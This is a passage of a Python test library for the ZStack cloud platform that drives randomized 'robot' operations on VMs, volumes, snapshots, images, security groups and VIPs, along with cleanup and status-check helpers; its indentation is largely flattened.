target_vm_nics = target_vm.vm.vmNics
sg_action, target_sg, target_nic, target_rule_uuid = SgRule.generate_random_sg_action(sg_vm, target_vm_nics)
    test_util.test_logger('Select [SG Operation:] %s, [sg uuid:] %s, [target_vm:] %s, [target nic:] %s, [target_rule]: %s .' % (sg_action, target_sg.security_group.uuid, target_vm.vm.uuid, target_nic.uuid, target_rule_uuid))
if sg_action == SgRule.add_rule_to_sg:
target_l3_uuid = target_nic.l3NetworkUuid
sg_stub_vm = sg_vm.get_stub_vm(target_l3_uuid)
        #create the test stub vm, if it does not exist. Why create test_vm here?
        #1, we need to make sure there is a SG test, then create the test vm.
        #2, when creating a sg rule, it needs to bind with a target IP
        #   address. So the target IP address is the test VM's ip address.
        #   Since it is meaningless to set the IP address of a test vm on a
        #   different L3, we need a test vm on the same L3 when adding a SG Rule.
if not sg_stub_vm:
#sg testing need to set cre_vm_opt.
create_sg_vm_option = test_util.VmOption()
create_sg_vm_option.set_name('sg_test_vm')
create_sg_vm_option.set_l3_uuids([target_l3_uuid])
create_sg_vm_option.set_image_uuid(cre_vm_opt.get_image_uuid())
            create_sg_vm_option.set_instance_offering_uuid(cre_vm_opt.get_instance_offering_uuid())
sg_stub_vm = lib_create_vm(create_sg_vm_option)
try:
sg_stub_vm.check()
except:
test_util.test_logger("Create Test Stub [VM:] %s (for SG testing) fail, as it's network checking failure. Has to quit." % sg_stub_vm.vm.uuid)
traceback.print_exc(file=sys.stdout)
test_util.test_fail("Create SG test stub vm fail.")
test_util.test_logger("Create Test [VM:] %s (for SG testing) successfully." % sg_stub_vm.vm.uuid)
sg_vm.add_stub_vm(target_l3_uuid, sg_stub_vm)
sg_stub_vm_l3_vmnic = lib_get_vm_nic_by_l3(sg_stub_vm.vm, target_l3_uuid)
sg_stub_vm_ip = sg_stub_vm_l3_vmnic.ip
#Generate a random SG rule
sg_target_rule = SgRule.generate_sg_rule(sg_stub_vm_ip)
        #ZStack will not allow adding a duplicated SG Rule. This checking might be removed, if it is harmless.
if not lib_get_sg_rule(target_sg.security_group.uuid, sg_target_rule):
test_util.test_dsc(\
'Robot Action: %s; on SG: %s' % \
(sg_action, target_sg.get_security_group().uuid))
rules = target_sg.add_rule([sg_target_rule])
rules_uuid = []
for rule in rules:
rules_uuid.append(rule.uuid)
test_util.test_dsc(\
'Robot Action Result: %s; new Rule: %s; on SG: %s' % \
(sg_action, rules_uuid, target_sg.get_security_group().uuid))
else:
test_util.test_logger(\
"skip add rule to sg: %s, since there is already one" \
% target_sg.security_group.uuid)
test_util.test_dsc('Robot Action: %s is skipped' % sg_action)
elif sg_action == SgRule.remove_rule_from_sg:
test_util.test_dsc(\
'Robot Action: %s; on SG: %s; on Rule: %s' % \
(sg_action, target_sg.get_security_group().uuid, \
target_rule_uuid))
target_sg.delete_rule_by_uuids([target_rule_uuid])
elif sg_action == SgRule.add_sg_to_vm:
test_util.test_dsc(\
'Robot Action: %s; on SG: %s; on VM: %s; on Nic: %s' % \
(sg_action, target_sg.get_security_group().uuid, \
target_vm.get_vm().uuid, target_nic.uuid))
sg_vm.attach(target_sg, [(target_nic.uuid, target_vm)])
elif sg_action == SgRule.remove_sg_from_vm:
test_util.test_dsc(\
'Robot Action: %s; on SG: %s; on VM: %s; on Nic: %s' % \
(sg_action, target_sg.get_security_group().uuid, \
target_vm.get_vm().uuid, target_nic.uuid))
sg_vm.detach(target_sg, target_nic.uuid)
#VIP Library
def lib_get_vm_eip_list(vm_uuid, session_uuid=None):
'''
    If the vm has any attached eip, it will return the eip list.
    If not, it will return an empty list [].
'''
vm_inv = lib_get_vm_by_uuid(vm_uuid, session_uuid)
vmNics = vm_inv.vmNics
if not vmNics:
return []
vmNics_uuid = []
for nic in vmNics:
vmNics_uuid.append(nic.uuid)
cond = res_ops.gen_query_conditions('vmNicUuid', 'in', \
','.join(vmNics_uuid))
result = res_ops.query_resource(res_ops.EIP, cond, session_uuid)
return result
def lib_get_vm_pf_list(vm_uuid, session_uuid=None):
'''
    If the vm has any attached portForwarding rule, it will return the pf list.
    If not, it will return an empty list [].
'''
vm_inv = lib_get_vm_by_uuid(vm_uuid, session_uuid)
vmNics = vm_inv.vmNics
if not vmNics:
return []
    vmNics_uuid = []
for nic in vmNics:
vmNics_uuid.append(nic.uuid)
cond = res_ops.gen_query_conditions('vmNicUuid', 'in', \
','.join(vmNics_uuid))
result = res_ops.query_resource(res_ops.PORT_FORWARDING, cond, session_uuid)
return result
def lib_create_vip_obj(vm=None, name='vip', l3_uuid=None, session_uuid=None):
    '''
    vm should be a VM behind a VR. The VIP will be allocated from the VR's
    public L3 network. If vm=None, will pick up any VR public L3 network.
    @return: vip_test_obj
    '''
if not l3_uuid:
if vm:
vrs = lib_find_vr_by_vm(vm)
for vr in vrs:
nic = lib_find_vr_pub_nic(vr)
if nic:
l3_uuid = nic.l3NetworkUuid
break
if not l3_uuid:
vr_offering = deploy_config.instanceOfferings.virtualRouterOffering
if isinstance(vr_offering, list):
l3_name = vr_offering[0].publicL3NetworkRef.text_
else:
l3_name = vr_offering.publicL3NetworkRef.text_
condition = res_ops.gen_query_conditions('name', '=', l3_name)
l3s = res_ops.query_resource(res_ops.L3_NETWORK, condition)
if l3s:
l3_uuid = l3s[0].uuid
if l3_uuid:
import zstackwoodpecker.zstack_test.zstack_test_vip as zstack_vip_header
vip = zstack_vip_header.ZstackTestVip()
vip_option = test_util.VipOption()
vip_option.set_name(name)
vip_option.set_l3_uuid(l3_uuid)
vip.set_creation_option(vip_option)
vip.create()
return vip
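#A minimal usage sketch (not part of the original library): allocate a VIP on
#the public L3 network of the vm's VR and release it afterwards.
def _example_vip_lifecycle(vm_inv):
    vip = lib_create_vip_obj(vm=vm_inv, name='example_vip')
    if not vip:
        test_util.test_fail('vip creation failed: no public l3 network was found')
    test_util.test_logger('created [vip:] %s' % vip.get_vip().uuid)
    vip.delete()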
def lib_delete_vip(vip_uuid):
net_ops.delete_vip(vip_uuid)
def lib_get_vip_by_uuid(vip_uuid):
conditions = res_ops.gen_query_conditions('uuid', '=', vip_uuid)
vip = res_ops.query_resource(res_ops.VIP, conditions)
return vip[0]
def lib_get_eip_by_uuid(eip_uuid):
conditions = res_ops.gen_query_conditions('uuid', '=', eip_uuid)
eip = res_ops.query_resource(res_ops.EIP, conditions)
return eip[0]
#----------- Robot Library -------------
def lib_robot_cleanup(test_dict):
for vm in test_dict.get_vm_list(vm_header.RUNNING):
vm.clean()
test_dict.mv_volumes(vm.vm.uuid, test_stage.free_volume)
for vm in test_dict.get_vm_list(vm_header.STOPPED):
vm.clean()
test_dict.mv_volumes(vm.vm.uuid, test_stage.free_volume)
for vm in test_dict.get_vm_list(vm_header.DESTROYED):
vm.clean()
for vl in test_dict.get_volume_list():
vl.clean()
for img in test_dict.get_image_list():
img.clean()
for img in test_dict.get_image_list(test_stage.deleted_image):
img.clean()
sg_vm = test_dict.get_sg_vm()
for vm in sg_vm.get_all_stub_vm():
if vm:
vm.clean()
for sg in sg_vm.get_all_sgs():
sg_vm.delete_sg(sg)
    #Deprecated
#for sg_uuid in test_dict.get_sg_list():
# lib_delete_security_group(sg_uuid)
for vip in test_dict.get_all_vip_list():
vip.delete()
for sp in test_dict.get_all_available_snapshots():
sp.delete()
for vm in test_dict.get_all_utility_vm():
vm.clean()
for account in test_dict.get_all_accounts():
account.delete()
for instance_offering in test_dict.get_all_instance_offerings():
vm_ops.delete_instance_offering(instance_offering.uuid)
for disk_offering in test_dict.get_all_disk_offerings():
vol_ops.delete_disk_offering(disk_offering.uuid)
def lib_error_cleanup(test_dict):
test_util.test_logger('- - - Error cleanup: running VM - - -')
for vm in test_dict.get_vm_list(vm_header.RUNNING):
try:
vm.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: stopped VM - - -')
for vm in test_dict.get_vm_list(vm_header.STOPPED):
try:
vm.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: destroyed VM - - -')
for vm in test_dict.get_vm_list(vm_header.DESTROYED):
try:
vm.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: volume - - -')
for vl in test_dict.get_all_volume_list():
try:
vl.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: image - - -')
for img in test_dict.get_image_list():
try:
img.clean()
except:
pass
for img in test_dict.get_image_list(test_stage.deleted_image):
try:
img.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: SG stub_vm - - -')
sg_vm = test_dict.get_sg_vm()
for vm in sg_vm.get_all_stub_vm():
if vm:
try:
vm.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: SG - - -')
for sg in sg_vm.get_all_sgs():
try:
sg_vm.delete_sg(sg)
except:
pass
for sg_uuid in test_dict.get_sg_list():
try:
lib_delete_security_group(sg_uuid)
except:
pass
test_util.test_logger('- - - Error cleanup: Vip/Eip/Pf - - -')
for vip in test_dict.get_all_vip_list():
try:
vip.delete()
except:
pass
test_util.test_logger('- - - Error cleanup: snapshots - - -')
for sp in test_dict.get_all_available_snapshots():
try:
sp.delete()
except:
pass
    test_util.test_logger('- - - Error cleanup: utility vm - - -')
for vm in test_dict.get_all_utility_vm():
try:
vm.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: accounts - - -')
for account in test_dict.get_all_accounts():
try:
account.delete()
except:
pass
test_util.test_logger('- - - Error cleanup: instance offerings- - -')
for instance_offering in test_dict.get_all_instance_offerings():
try:
vm_ops.delete_instance_offering(instance_offering.uuid)
except:
pass
test_util.test_logger('- - - Error cleanup: disk offerings- - -')
for disk_offering in test_dict.get_all_disk_offerings():
try:
vol_ops.delete_disk_offering(disk_offering.uuid)
except:
pass
def lib_robot_status_check(test_dict):
print 'target checking test dict: %s' % test_dict
test_util.test_logger('- - - check running VMs status - - -')
for vm in test_dict.get_vm_list(vm_header.RUNNING):
vm.check()
test_util.test_logger('- - - check stopped vm status - - -')
for vm in test_dict.get_vm_list(vm_header.STOPPED):
vm.check()
test_util.test_logger('- - - check volume status - - -')
for volume in test_dict.get_all_volume_list():
volume.check()
test_util.test_logger('- - - check image status - - -')
for image in test_dict.get_image_list():
image.check()
test_util.test_logger('- - - check SG rules - - -')
sg_vm = test_dict.get_sg_vm()
sg_vm.check()
test_util.test_logger('- - - check vip eip/pf - - -')
for vip in test_dict.get_all_vip_list():
if vip:
vip.check()
test_util.test_logger('- - - check Snapshot - - -')
volume_snapshots = test_dict.get_all_available_snapshots()
for snapshots in volume_snapshots:
snapshots.check()
test_util.test_logger("- - - Robot check pass - - -" )
def lib_vm_random_operation(robot_test_obj):
'''
Random operations for robot testing
'''
test_dict = robot_test_obj.get_test_dict()
print 'target test dict for random operation: %s' % test_dict
excluded_actions_list = robot_test_obj.get_exclusive_actions_list()
cre_vm_opt = robot_test_obj.get_vm_creation_option()
priority_actions = robot_test_obj.get_priority_actions()
random_type = robot_test_obj.get_random_type()
public_l3 = robot_test_obj.get_public_l3()
test_stage_obj = test_stage()
target_vm = None
attached_volume = None
ready_volume = None
snapshot_volume = None
target_snapshot = None
#Firstly, choose a target VM state for operation. E.g. Running.
if test_dict.get_vm_list(vm_header.STOPPED):
if test_dict.get_vm_list(vm_header.DESTROYED):
target_vm_state = random.choice([vm_header.RUNNING, \
vm_header.STOPPED, vm_header.DESTROYED])
else:
target_vm_state = random.choice([vm_header.RUNNING, \
vm_header.STOPPED])
else:
if test_dict.get_vm_list(vm_header.DESTROYED):
target_vm_state = random.choice([vm_header.RUNNING, \
vm_header.DESTROYED])
else:
target_vm_state = vm_header.RUNNING
#Secondly, choose a target VM from target status.
target_vm_list = test_dict.get_vm_list(target_vm_state)
if target_vm_list:
target_vm = random.choice(target_vm_list)
vm = lib_get_vm_by_uuid(target_vm.get_vm().uuid)
#vm state in db
vm_current_state = vm.state
if target_vm_state != vm_current_state:
            test_util.test_fail('[vm:] %s current [state:] %s is not aligned with random test record [state:] %s .' % (target_vm.get_vm().uuid, vm_current_state, target_vm_state))
test_stage_obj.set_vm_state(vm_current_state)
test_util.test_logger('target vm is : %s' % target_vm.get_vm().uuid)
test_util.test_logger('target test obj: %s' % test_dict)
host_inv = lib_find_host_by_vm(vm)
if host_inv:
bs = lib_get_backup_storage_list_by_vm(vm)[0]
if lib_check_live_snapshot_cap(host_inv) and bs.type == inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
test_stage_obj.set_vm_live_template_cap(test_stage.template_live_creation)
else:
test_stage_obj.set_vm_live_template_cap(test_stage.template_no_live_creation)
#Thirdly, check VM's volume status. E.g. if could add a new volume.
vm_volumes = test_dict.get_volume_list(target_vm.get_vm().uuid)
vm_volume_number = len(vm_volumes)
if vm_volume_number > 0 and vm_volume_number < 24:
test_stage_obj.set_vm_volume_state(test_stage.vm_volume_att_not_full)
attached_volume = random.choice(vm_volumes)
elif vm_volume_number == 0:
test_stage_obj.set_vm_volume_state(test_stage.vm_no_volume_att)
else:
test_stage_obj.set_vm_volume_state(test_stage.vm_volume_att_full)
attached_volume = random.choice(vm_volumes)
if lib_check_vm_live_migration_cap(vm):
test_stage_obj.set_vm_live_migration_cap(test_stage.vm_live_migration)
else:
test_stage_obj.set_vm_live_migration_cap(test_stage.no_vm_live_migration)
else:
test_stage_obj.set_vm_state(test_stage.Any)
test_stage_obj.set_vm_volume_state(test_stage.Any)
test_stage_obj.set_vm_live_migration_cap(test_stage.Any)
#Fourthly, choose a available volume for possibly attach or delete
avail_volumes = list(test_dict.get_volume_list(test_stage.free_volume))
avail_volumes.extend(test_dict.get_volume_list(test_stage.deleted_volume))
if avail_volumes:
ready_volume = random.choice(avail_volumes)
if ready_volume.get_state() != vol_header.DELETED:
test_stage_obj.set_volume_state(test_stage.free_volume)
else:
test_stage_obj.set_volume_state(test_stage.deleted_volume)
else:
test_stage_obj.set_volume_state(test_stage.no_free_volume)
    #Fifthly, choose a volume for a possible snapshot operation
all_volume_snapshots = test_dict.get_all_available_snapshots()
if all_volume_snapshots:
target_volume_snapshots = random.choice(all_volume_snapshots)
snapshot_volume_obj = target_volume_snapshots.get_target_volume()
snapshot_volume = snapshot_volume_obj.get_volume()
if snapshot_volume_obj.get_state() == vol_header.CREATED:
            #It means the volume is just created and not attached to any VM yet.
            #No snapshot can be created from this volume.
test_stage_obj.set_snapshot_state(test_stage.no_volume_file)
else:
            #if the volume is not attached to any VM, we assume the vm state is
            # stopped, or we assume its hypervisor supports live snapshot creation
if snapshot_volume_obj.get_state() != vol_header.ATTACHED:
test_stage_obj.set_snapshot_live_cap(test_stage.snapshot_live_creation)
test_stage_obj.set_volume_vm_state(vm_header.STOPPED)
elif snapshot_volume_obj.get_target_vm().get_state() == vm_header.DESTROYED:
test_stage_obj.set_snapshot_live_cap(test_stage.Any)
test_stage_obj.set_volume_vm_state(vm_header.DESTROYED)
else:
volume_vm = snapshot_volume_obj.get_target_vm()
test_stage_obj.set_volume_vm_state(volume_vm.get_state())
target_vm_inv = volume_vm.get_vm()
host_inv = lib_find_host_by_vm(target_vm_inv)
if host_inv:
if lib_check_live_snapshot_cap(host_inv):
test_stage_obj.set_snapshot_live_cap(test_stage.snapshot_live_creation)
else:
test_stage_obj.set_snapshot_live_cap(test_stage.snapshot_no_live_creation)
            #randomly pick up an available snapshot. Firstly choose from primary snapshots.
target_snapshot = None
#If volume is expunged, there isn't snapshot in primary storage
if target_volume_snapshots.get_primary_snapshots() \
and snapshot_volume_obj.get_state() != vol_header.DELETED\
and snapshot_volume_obj.get_state() != vol_header.EXPUNGED:
target_snapshot = random.choice(target_volume_snapshots.get_primary_snapshots())
if target_snapshot in target_volume_snapshots.get_backuped_snapshots():
if target_snapshot.get_volume_type() \
== vol_header.ROOT_VOLUME:
test_stage_obj.set_snapshot_state(test_stage.root_snapshot_in_both_ps_bs)
else:
test_stage_obj.set_snapshot_state(test_stage.data_snapshot_in_both_ps_bs)
else:
if target_snapshot.get_volume_type() \
== vol_header.ROOT_VOLUME:
test_stage_obj.set_snapshot_state(test_stage.root_snapshot_in_ps)
else:
test_stage_obj.set_snapshot_state(test_stage.data_snapshot_in_ps)
else:
if target_volume_snapshots.get_backuped_snapshots():
target_snapshot = random.choice(target_volume_snapshots.get_backuped_snapshots())
if target_snapshot.get_volume_type() \
== vol_header.ROOT_VOLUME:
test_stage_obj.set_snapshot_state(test_stage.root_snapshot_in_bs)
else:
test_stage_obj.set_snapshot_state(test_stage.data_snapshot_in_bs)
else:
test_stage_obj.set_snapshot_state(test_stage.no_snapshot)
    #Sixthly, check system vip resource
vip_available = False
    if TestAction.create_vip not in excluded_actions_list:
if not public_l3:
            test_util.test_fail('\
Test case needs to set robot_test_obj.public_l3 before calling \
lib_vm_random_operation(robot_test_obj); otherwise robot can not judge if there \
is available free vip resource in the system. Or you can add the "create_vip" \
action into robot_test_obj.exclusive_actions_list.')
#check if system has available IP resource for allocation.
available_ip_evt = net_ops.get_ip_capacity_by_l3s([public_l3])
if available_ip_evt and available_ip_evt.availableCapacity > 0:
vip_available = True
#Add template image actions
avail_images = list(test_dict.get_image_list(test_stage.new_template_image))
avail_images.extend(test_dict.get_image_list(test_stage.deleted_image))
if avail_images:
target_image = random.choice(avail_images)
if target_image.get_state() != image_header.DELETED:
test_stage_obj.set_image_state(test_stage.new_template_image)
else:
test_stage_obj.set_image_state(test_stage.deleted_image)
else:
test_stage_obj.set_image_state(test_stage.Any)
#Add SG actions
if test_dict.get_sg_list():
test_stage_obj.set_sg_state(test_stage.has_sg)
else:
test_stage_obj.set_sg_state(test_stage.no_sg)
#Add VIP actions
if test_dict.get_vip_list():
if vip_available:
test_stage_obj.set_vip_state(test_stage.has_vip)
else:
test_stage_obj.set_vip_state(test_stage.no_more_vip_res)
else:
if vip_available:
test_stage_obj.set_vip_state(test_stage.no_vip)
else:
test_stage_obj.set_vip_state(test_stage.no_vip_res)
test_util.test_logger("action state_dict: %s" % test_stage_obj.get_state())
if avail_images and target_image != None and target_image.get_image().mediaType == 'RootVolumeTemplate':
if excluded_actions_list == None:
excluded_actions_list2 = [TestAction.create_data_volume_from_image]
else:
excluded_actions_list2 = excluded_actions_list + [TestAction.create_data_volume_from_image]
action_list = ts_header.generate_action_list(test_stage_obj, \
excluded_actions_list2)
else:
action_list = ts_header.generate_action_list(test_stage_obj, \
excluded_actions_list)
test_util.test_logger('action list: %s' % action_list)
    # Currently the next action is picked randomly.
next_action = lib_robot_pickup_action(action_list, \
robot_test_obj.get_action_history(), priority_actions, random_type)
robot_test_obj.add_action_history(next_action)
if next_action == TestAction.create_vm:
test_util.test_dsc('Robot Action: %s ' % next_action)
new_vm = lib_create_vm(cre_vm_opt)
test_dict.add_vm(new_vm)
test_util.test_dsc('Robot Action Result: %s; new VM: %s' % \
(next_action, new_vm.get_vm().uuid))
test_dict.create_empty_volume_list(new_vm.vm.uuid)
elif next_action == TestAction.stop_vm:
test_util.test_dsc('Robot Action: %s; on VM: %s' \
% (next_action, target_vm.get_vm().uuid))
target_vm.stop()
test_dict.mv_vm(target_vm, vm_header.RUNNING, vm_header.STOPPED)
elif next_action == TestAction.start_vm :
test_util.test_dsc('Robot Action: %s; on VM: %s' \
% (next_action, target_vm.get_vm().uuid))
target_vm.start()
test_dict.mv_vm(target_vm, vm_header.STOPPED, vm_header.RUNNING)
elif next_action == TestAction.reboot_vm :
test_util.test_dsc('Robot Action: %s; on VM: %s' \
% (next_action, target_vm.get_vm().uuid))
target_vm.reboot()
elif next_action == TestAction.destroy_vm :
test_util.test_dsc('Robot Action: %s; on VM: %s' \
% (next_action, target_vm.get_vm().uuid))
target_vm.destroy()
test_dict.rm_vm(target_vm, vm_current_state)
elif next_action == TestAction.expunge_vm :
test_util.test_dsc('Robot Action: %s; on VM: %s' \
% (next_action, target_vm.get_vm().uuid))
target_vm.expunge()
test_dict.rm_vm(target_vm, vm_current_state)
elif next_action == TestAction.migrate_vm :
test_util.test_dsc('Robot Action: %s; on VM: %s' \
% (next_action, target_vm.get_vm().uuid))
target_host = lib_find_random_host(target_vm.vm)
if not target_host:
            test_util.test_logger('no available host was found for doing vm migration')
else:
target_vm.migrate(target_host.uuid)
elif next_action == TestAction.create_volume :
test_util.test_dsc('Robot Action: %s ' % next_action)
new_volume = lib_create_volume_from_offering()
test_dict.add_volume(new_volume)
test_util.test_dsc('Robot Action Result: %s; new Volume: %s' % \
(next_action, new_volume.get_volume().uuid))
elif next_action == TestAction.attach_volume :
test_util.test_dsc('Robot Action: %s; on Volume: %s; on VM: %s' % \
(next_action, ready_volume.get_volume().uuid, \
target_vm.get_vm().uuid))
if not lib_check_vm_live_migration_cap(target_vm.vm):
ls_ref = lib_get_local_storage_reference_information(ready_volume.get_volume().uuid)
if ls_ref:
volume_host_uuid = ls_ref[0].hostUuid
vm_host_uuid = lib_get_vm_host(target_vm.vm).uuid
if vm_host_uuid and volume_host_uuid != vm_host_uuid:
test_util.test_logger('need to migrate volume: %s to host: %s, before attach it to vm: %s' % (ready_volume.get_volume().uuid, vm_host_uuid, target_vm.vm.uuid))
ready_volume.migrate(vm_host_uuid)
ready_volume.attach(target_vm)
test_dict.mv_volume(ready_volume, test_stage.free_volume, target_vm.vm.uuid)
elif next_action == TestAction.detach_volume:
test_util.test_dsc('Robot Action: %s; on Volume: %s' % \
(next_action, attached_volume.get_volume().uuid))
attached_volume.detach()
test_dict.mv_volume(attached_volume, target_vm.vm.uuid, test_stage.free_volume)
elif next_action == TestAction.delete_volume:
        #if there is no free volume but the action is delete_volume, it means
        # the target volume is an attached volume.
if not ready_volume:
ready_volume = attached_volume
test_util.test_dsc('Robot Action: %s; on Volume: %s' % \
(next_action, ready_volume.get_volume().uuid))
ready_volume.delete()
test_dict.rm_volume(ready_volume)
elif next_action == TestAction.expunge_volume:
test_util.test_dsc('Robot Action: %s; on Volume: %s' % \
(next_action, ready_volume.get_volume().uuid))
ready_volume.expunge()
test_dict.rm_volume(ready_volume)
elif next_action == TestAction.migrate_volume :
#TODO: add normal initialized data volume into migration target.
root_volume_uuid = lib_get_root_volume(target_vm.get_vm()).uuid
test_util.test_dsc('Robot Action: %s; on Volume: %s; on VM: %s' \
% (next_action, root_volume_uuid, target_vm.get_vm().uuid))
target_host = lib_find_random_host_by_volume_uuid(root_volume_uuid)
if not target_host:
            test_util.test_logger('no available host was found for doing volume migration')
else:
vol_ops.migrate_volume(root_volume_uuid, target_host.uuid)
elif next_action == TestAction.idel :
test_util.test_dsc('Robot Action: %s ' % next_action)
lib_vm_random_idel_time(1, 5)
elif next_action == TestAction.create_image_from_volume:
root_volume_uuid = lib_get_root_volume(target_vm.vm).uuid
test_util.test_dsc('Robot Action: %s; on Volume: %s; on VM: %s' % \
(next_action, root_volume_uuid, target_vm.get_vm().uuid))
new_image = lib_create_template_from_volume(root_volume_uuid)
test_util.test_dsc('Robot Action Result: %s; new RootVolume Image: %s'\
% (next_action, new_image.get_image().uuid))
test_dict.add_image(new_image)
elif next_action == TestAction.create_data_vol_template_from_volume:
vm_volumes = target_vm.get_vm().allVolumes
vm_target_vol_candidates = []
for vm_volume in vm_volumes:
if vm_volume.status != 'Deleted':
vm_target_vol_candidates.append(vm_volume)
vm_target_vol = random.choice(vm_target_vol_candidates)
test_util.test_dsc('Robot Action: %s; on Volume: %s; on VM: %s' % \
(next_action, vm_target_vol.uuid, target_vm.get_vm().uuid))
new_data_vol_temp = lib_create_data_vol_template_from_volume(target_vm, vm_target_vol)
test_util.test_dsc('Robot Action Result: %s; new DataVolume Image: %s' \
% (next_action, new_data_vol_temp.get_image().uuid))
test_dict.add_image(new_data_vol_temp)
elif next_action == TestAction.create_data_volume_from_image:
test_util.test_dsc('Robot Action: %s; on Image: %s' % \
(next_action, target_image.get_image().uuid))
new_volume = lib_create_data_volume_from_image(target_image)
test_util.test_dsc('Robot Action Result: %s; new Volume: %s' % \
(next_action, new_volume.get_volume().uuid))
test_dict.add_volume(new_volume)
elif next_action == TestAction.delete_image:
test_util.test_dsc('Robot Action: %s; on Image: %s' % \
(next_action, target_image.get_image().uuid))
target_image.delete()
test_dict.rm_image(target_image)
        #image will be moved to the deleted state when rm_image is called
#test_dict.add_image(target_image, test_stage.deleted_image)
elif next_action == TestAction.expunge_image:
test_util.test_dsc('Robot Action: %s; on Image: %s' % \
(next_action, target_image.get_image().uuid))
bss = target_image.get_image().backupStorageRefs
bs_uuid_list = []
for bs in bss:
bs_uuid_list.append(bs.backupStorageUuid)
target_image.expunge(bs_uuid_list)
test_dict.rm_image(target_image)
elif next_action == TestAction.create_sg:
test_util.test_dsc('Robot Action: %s ' % next_action)
sg_vm = test_dict.get_sg_vm()
sg_creation_option = test_util.SecurityGroupOption()
sg_creation_option.set_name('robot security group')
new_sg = sg_vm.create_sg(sg_creation_option)
test_util.test_dsc(\
'Robot Action Result: %s; new SG: %s' % \
(next_action, new_sg.get_security_group().uuid))
elif next_action == TestAction.delete_sg:
sg_vm = test_dict.get_sg_vm()
target_sg = random.choice(sg_vm.get_all_sgs())
test_util.test_dsc(\
'Robot Action: %s; on SG: %s' % \
(next_action, target_sg.get_security_group().uuid))
sg_vm.delete_sg(target_sg)
#sg rule actions
elif next_action == TestAction.sg_rule_operations:
lib_execute_random_sg_rule_operation(test_dict, target_vm, cre_vm_opt)
#vip actions
elif next_action == TestAction.create_vip:
test_util.test_dsc('Robot Action: %s ' % next_action)
if target_vm:
vip = lib_create_vip_obj(target_vm.vm)
else:
vip = lib_create_vip_obj()
if not vip:
test_util.test_warn('vip creation failed. It is mostly because can not find public l3 network.')
test_util.test_dsc('Robot Action Result: %s; Fail.' % next_action)
else:
test_dict.add_vip(vip)
test_util.test_dsc('Robot Action Result: %s; new VIP: %s' % \
(next_action, vip.get_vip().uuid))
elif next_action == TestAction.delete_vip:
target_vip = random.choice(test_dict.get_all_vip_list())
test_util.test_dsc('Robot Action: %s; on VIP: %s' % \
(next_action, target_vip.get_vip().uuid))
net_ops.delete_vip(target_vip.get_vip().uuid)
test_dict.rm_vip(target_vip)
elif next_action == TestAction.vip_operations:
vip_action = ts_header.VipAction(test_dict, target_vm)
vip_action.execute_random_vip_ops()
elif next_action == TestAction.create_volume_snapshot:
target_volume_inv = \
target_volume_snapshots.get_target_volume().get_volume()
if target_volume_inv.type == vol_header.ROOT_VOLUME:
test_util.test_dsc('Robot Action: %s; on Root Volume: %s; on VM: %s' % \
(next_action, \
target_volume_inv.uuid, target_volume_inv.vmInstanceUuid))
else:
test_util.test_dsc('Robot Action: %s; on Volume: %s' % \
(next_action, \
target_volume_inv.uuid))
new_snapshot = lib_create_volume_snapshot_from_volume(target_volume_snapshots, robot_test_obj, test_dict, cre_vm_opt)
test_util.test_dsc('Robot Action Result: %s; new SP: %s' % \
(next_action, new_snapshot.get_snapshot().uuid))
elif next_action == TestAction.delete_volume_snapshot:
target_volume_snapshots.delete_snapshot(target_snapshot)
test_util.test_dsc('Robot Action: %s; on Volume: %s; on SP: %s' % \
(next_action, \
target_volume_snapshots.get_target_volume().get_volume().uuid, \
target_snapshot.get_snapshot().uuid))
#If both volume and snapshots are deleted, volume_snapshot obj could be
# removed.
if not target_volume_snapshots.get_backuped_snapshots():
target_volume_obj = target_volume_snapshots.get_target_volume()
if target_volume_obj.get_state() == vol_header.EXPUNGED \
or (target_volume_snapshots.get_volume_type() == \
vol_header.ROOT_VOLUME \
and target_volume_obj.get_target_vm().get_state() == \
vm_header.EXPUNGED):
test_dict.rm_volume_snapshot(target_volume_snapshots)
elif next_action == TestAction.use_volume_snapshot:
test_util.test_dsc('Robot Action: %s; on Volume: %s; on SP: %s' % \
(next_action, \
target_volume_snapshots.get_target_volume().get_volume().uuid, \
target_snapshot.get_snapshot().uuid))
target_volume_snapshots.use_snapshot(target_snapshot)
elif next_action == TestAction.backup_volume_snapshot:
test_util.test_dsc('Robot Action: %s; on Volume: %s; on SP: %s' % \
(next_action, \
target_volume_snapshots.get_target_volume().get_volume().uuid, \
target_snapshot.get_snapshot().uuid))
target_volume_snapshots.backup_snapshot(target_snapshot)
elif next_action == TestAction.delete_backup_volume_snapshot:
test_util.test_dsc('Robot Action: %s; on Volume: %s; on SP: %s' % \
(next_action, \
target_volume_snapshots.get_target_volume().get_volume().uuid, \
target_snapshot.get_snapshot().uuid))
target_volume_snapshots.delete_backuped_snapshot(target_snapshot)
        #If both volume and snapshots are deleted, the volume_snapshot obj could
        # be removed.
if not target_volume_snapshots.get_backuped_snapshots():
target_volume_obj = target_volume_snapshots.get_target_volume()
if target_volume_obj.get_state() == vol_header.EXPUNGED \
or (target_volume_snapshots.get_volume_type() == \
vol_header.ROOT_VOLUME \
and target_volume_obj.get_target_vm().get_state() == \
vm_header.EXPUNGED):
test_dict.rm_volume_snapshot(target_volume_snapshots)
elif next_action == TestAction.create_volume_from_snapshot:
test_util.test_dsc('Robot Action: %s; on Volume: %s; on SP: %s' % \
(next_action, \
target_volume_snapshots.get_target_volume().get_volume().uuid, \
target_snapshot.get_snapshot().uuid))
new_volume_obj = target_snapshot.create_data_volume()
test_dict.add_volume(new_volume_obj)
test_util.test_dsc('Robot Action Result: %s; new Volume: %s; on SP: %s'\
% (next_action, new_volume_obj.get_volume().uuid,\
target_snapshot.get_snapshot().uuid))
elif next_action == TestAction.create_image_from_snapshot:
test_util.test_dsc('Robot Action: %s; on Volume: %s; on SP: %s' % \
(next_action, \
target_volume_snapshots.get_target_volume().get_volume().uuid, \
target_snapshot.get_snapshot().uuid))
new_image_obj = lib_create_image_from_snapshot(target_snapshot)
test_dict.add_image(new_image_obj)
test_util.test_dsc('Robot Action Result: %s; new Image: %s; on SP: %s'\
% (next_action, new_image_obj.get_image().uuid,\
target_snapshot.get_snapshot().uuid))
    test_util.test_logger('Finish action: %s execution' % next_action)
#TODO: add more action pickup strategy
def lib_robot_pickup_action(action_list, pre_robot_actions, \
priority_actions, selector_type):
